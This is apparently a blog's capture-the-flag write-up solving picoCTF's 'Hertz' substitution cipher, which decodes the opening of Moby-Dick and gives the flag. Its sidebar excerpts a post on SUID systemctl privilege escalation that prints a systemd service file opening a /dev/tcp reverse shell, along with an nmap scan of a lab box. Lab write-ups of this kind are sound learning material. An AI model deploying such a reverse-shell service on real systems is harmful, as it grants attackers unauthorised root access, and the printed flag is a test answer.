Skip to main content

picoCTF Crypto Hertz

picoCTF Crypto Hertz


Objective:
Here's another simple cipher for you where we made a bunch of substitutions. Can you decrypt it? Connect with nc 2018shell.picoctf.com 48186.


Solution:

-------------------------------------------------------------------------------
ilahpgwe bqpq ue clkp mjgh - eksewuwkwula_iudbqpe_gpq_eljrgsjq_rvgeipxugy
-------------------------------------------------------------------------------
igjj yq uebygqj. elyq cqgpe ghl-aqrqp yuav blx jlah dpqiueqjc-bgruah juwwjq lp al ylaqc ua yc dkpeq, gav alwbuah dgpwuikjgp wl uawqpqew yq la eblpq, u wblkhbw u xlkjv eguj gslkw g juwwjq gav eqq wbq xgwqpc dgpw lm wbq xlpjv. uw ue g xgc u bgrq lm vpuruah lmm wbq edjqqa gav pqhkjgwuah wbq iupikjgwula. xbqaqrqp u muav yceqjm hplxuah hpuy gslkw wbq ylkwb; xbqaqrqp uw ue g vgyd, vpunnjc alrqysqp ua yc elkj; xbqaqrqp u muav yceqjm uarljkawgpujc dgkeuah sqmlpq ilmmua xgpqblkeqe, gav spuahuah kd wbq pqgp lm qrqpc mkaqpgj u yqqw; gav qedqiugjjc xbqaqrqp yc bcdle hqw ekib ga kddqp bgav lm yq, wbgw uw pqokupqe g ewplah ylpgj dpuaiudjq wl dpqrqaw yq mply vqjusqpgwqjc ewqdduah uawl wbq ewpqqw, gav yqwblvuigjjc talituah dqldjq'e bgwe lmm-wbqa, u giilkaw uw buhb wuyq wl hqw wl eqg ge ella ge u iga. wbue ue yc eksewuwkwq mlp duewlj gav sgjj. xuwb g dbujleldbuigj mjlkpueb igwl wbplxe buyeqjm kdla bue exlpv; u okuqwjc wgtq wl wbq ebud. wbqpq ue alwbuah ekpdpueuah ua wbue. um wbqc skw taqx uw, gjylew gjj yqa ua wbqup vqhpqq, elyq wuyq lp lwbqp, ibqpueb rqpc aqgpjc wbq egyq mqqjuahe wlxgpve wbq liqga xuwb yq.

wbqpq alx ue clkp uaekjgp iuwc lm wbq ygabgwwlqe, sqjwqv plkav sc xbgprqe ge uavuga uejqe sc ilpgj pqqme-ilyyqpiq ekpplkave uw xuwb bqp ekpm. puhbw gav jqmw, wbq ewpqqwe wgtq clk xgwqpxgpv. uwe qfwpqyq vlxawlxa ue wbq sgwwqpc, xbqpq wbgw alsjq yljq ue xgebqv sc xgrqe, gav illjqv sc spqqnqe, xbuib g mqx blkpe dpqrulke xqpq lkw lm euhbw lm jgav. jllt gw wbq iplxve lm xgwqp-hgnqpe wbqpq.

iupikygyskjgwq wbq iuwc lm g vpqgyc egssgwb gmwqpalla. hl mply ilpjqgpe bllt wl ilqawuqe ejud, gav mply wbqaiq, sc xbuwqbgjj, alpwbxgpv. xbgw vl clk eqq?-dlewqv jutq eujqaw eqawuaqje gjj gplkav wbq wlxa, ewgav wblkegave kdla wblkegave lm ylpwgj yqa mufqv ua liqga pqrqpuqe. elyq jqgauah ghguaew wbq edujqe; elyq eqgwqv kdla wbq duqp-bqgve; elyq jlltuah lrqp wbq skjxgpte lm ebude mply ibuag; elyq buhb gjlmw ua wbq puhhuah, ge um ewpuruah wl hqw g ewujj sqwwqp eqgxgpv dqqd. skw wbqeq gpq gjj jgaveyqa; lm xqqt vgce dqaw kd ua jgwb gav djgewqp-wuqv wl ilkawqpe, agujqv wl sqaibqe, ijuaibqv wl vqete. blx wbqa ue wbue? gpq wbq hpqqa muqjve hlaq? xbgw vl wbqc bqpq?

skw jllt! bqpq ilyq ylpq iplxve, dgiuah ewpguhbw mlp wbq xgwqp, gav eqqyuahjc slkav mlp g vurq. ewpgahq! alwbuah xujj ilawqaw wbqy skw wbq qfwpqyqew juyuw lm wbq jgav; jluwqpuah kavqp wbq ebgvc jqq lm clavqp xgpqblkeqe xujj alw ekmmuiq. al. wbqc ykew hqw zkew ge auhb wbq xgwqp ge wbqc dleeusjc iga xuwblkw mgjjuah ua. gav wbqpq wbqc ewgav-yujqe lm wbqy-jqghkqe. uajgavqpe gjj, wbqc ilyq mply jgaqe gav gjjqce, ewpqqwe gav grqakqe-alpwb, qgew, elkwb, gav xqew. cqw bqpq wbqc gjj kauwq. wqjj yq, vlqe wbq yghaqwui rupwkq lm wbq aqqvjqe lm wbq ilydgeeqe lm gjj wbleq ebude gwwpgiw wbqy wbuwbqp?


This cipher appears to just be a substituion cipher so I plugged it into this website which broke the cipher for me

https://www.dcode.fr/monoalphabetic-substitution

I could assume it was a substitution cipher mostly because the spacing on the words look like they could be English
I could also see uses of double characters which is common in the English language


picoCTF{substitution_ciphers_are_solvable_vdascrwiam}




https://www.guballa.de/substitution-solver


Here is the character map
abcdefghijklmnopqrstuvwxyz    
gsivqmhbuztjyaldopewkrxfcn   


The decoded text is 

-------------------------------------------------------------------------------
congrats here is your flag - substitution_ciphers_are_solvable_vdascrwiam
-------------------------------------------------------------------------------
call me ishmael. some years ago-never mind how long precisely-having little or no money in my purse, and nothing particular to interest me on shore, i thought i would sail about a little and see the watery part of the world. it is a way i have of driving off the spleen and regulating the circulation. whenever i find myself growing grim about the mouth; whenever it is a damp, drizzly november in my soul; whenever i find myself involuntarily pausing before coffin warehouses, and bringing up the rear of every funeral i meet; and especially whenever my hypos get such an upper hand of me, that it requires a strong moral principle to prevent me from deliberately stepping into the street, and methodically knocking people's hats off-then, i account it high time to get to sea as soon as i can. this is my substitute for pistol and ball. with a philosophical flourish cato throws himself upon his sword; i quietly take to the ship. there is nothing surprising in this. if they but knew it, almost all men in their degree, some time or other, cherish very nearly the same feelings towards the ocean with me.

there now is your insular city of the manhattoes, belted round by wharves as indian isles by coral reefs-commerce surrounds it with her surf. right and left, the streets take you waterward. its extreme downtown is the battery, where that noble mole is washed by waves, and cooled by breezes, which a few hours previous were out of sight of land. look at the crowds of water-gazers there.

circumambulate the city of a dreamy sabbath afternoon. go from corlears hook to coenties slip, and from thence, by whitehall, northward. what do you see?-posted like silent sentinels all around the town, stand thousands upon thousands of mortal men fixed in ocean reveries. some leaning against the spiles; some seated upon the pier-heads; some looking over the bulwarks of ships from china; some high aloft in the rigging, as if striving to get a still better seaward peep. but these are all landsmen; of week days pent up in lath and plaster-tied to counters, nailed to benches, clinched to desks. how then is this? are the green fields gone? what do they here?

but look! here come more crowds, pacing straight for the water, and seemingly bound for a dive. strange! nothing will content them but the extremest limit of the land; loitering under the shady lee of yonder warehouses will not suffice. no. they must get just as nigh the water as they possibly can without falling in. and there they stand-miles of them-leagues. inlanders all, they come from lanes and alleys, streets and avenues-north, east, south, and west. yet here they all unite. tell me, does the magnetic virtue of the needles of the compasses of all those ships attract them thither?

Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more